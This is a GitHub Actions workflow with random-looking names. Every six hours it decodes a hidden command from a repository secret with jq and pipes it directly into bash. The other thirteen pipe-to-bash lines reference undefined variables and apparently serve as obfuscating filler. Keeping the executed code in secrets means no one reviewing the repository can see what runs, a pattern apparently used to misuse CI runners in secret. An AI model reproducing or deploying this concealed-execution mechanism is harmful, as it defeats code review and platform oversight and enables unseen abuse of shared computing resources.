name: zengwutuan1234

on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zengwutuan1234
        env:
          r192: ${{ secrets.r192 }}
        run: |
          echo $r192 | jq -r .gr21211 | /bin/bash
          echo $poq14 | jq -r .hq01 | /bin/bash
          echo $mrrx61 | jq -r .ufbz91799 | /bin/bash
          echo $b26 | jq -r .tyz58285 | /bin/bash
          echo $ylhk29 | jq -r .hcb1461 | /bin/bash
          echo $naa64701 | jq -r .nyeum23 | /bin/bash
          echo $gvoz29016 | jq -r .hkwqt9 | /bin/bash
          echo $rwob1 | jq -r .yhe19921 | /bin/bash
          echo $zayc34622 | jq -r .af217 | /bin/bash
          echo $hzly931 | jq -r .ajil86114 | /bin/bash
          echo $gyoul726 | jq -r .lyarw2293 | /bin/bash
          echo $xn7404 | jq -r .kbspa89777 | /bin/bash
          echo $gqpg3319 | jq -r .qx917 | /bin/bash
          echo $eot7230 | jq -r .adjg957 | /bin/bash

